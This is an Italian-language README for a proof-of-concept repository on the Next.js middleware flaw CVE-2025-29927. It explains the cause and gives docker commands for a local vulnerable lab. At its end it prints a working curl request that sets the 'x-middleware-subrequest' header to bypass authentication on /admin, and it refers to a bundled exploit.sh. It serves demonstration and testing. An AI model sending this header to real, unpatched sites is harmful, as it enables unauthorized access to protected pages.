
Ricerca sulla vulnerabilità del middleware di Next.js (CVE-2025-29927) che consente il bypass dell'autorizzazione e potenziali exploit.
Questo repository dimostra una vulnerabilità critica nel middleware di Next.js (CVE-2025-29927), che interessa le versioni dalla 11.1.4 alla 15.1.7. Questa vulnerabilità consente bypass dell'autorizzazione, bypass della CSP e potenziali attacchi DoS tramite cache-poisoning. Il problema ha origine nel modo in cui viene gestita l'header x-middleware-subrequest, consentendo agli attaccanti di aggirare i meccanismi di protezione del middleware.
Questa prova di concetto è specifica per la vulnerabilità in v12
Configura l'ambiente vulnerabile usando docker e i file di questo repository eseguendo:
git clone https://github.com/l1uk/nextjs-middleware-exploit.git
cd nextjs-middleware-exploit
docker build -t my-next-app .
docker run -p 3000:3000 my-next-app
Questo repository contiene lo script exploit.sh già creato per testare lo sfruttamento della vulnerabilità. Per testarlo esegui:
chmod +x exploit.sh
./exploit.sh
Inoltre puoi testare lo sfruttamento della vulnerabilità provando quanto segue:
login.curl -i http://localhost:3000/admin
x-middleware-subrequest. Dovresti riuscire a bypassare la pagina di autenticazione.curl -i -H "x-middleware-subrequest: pages/_middleware" http://localhost:3000/admin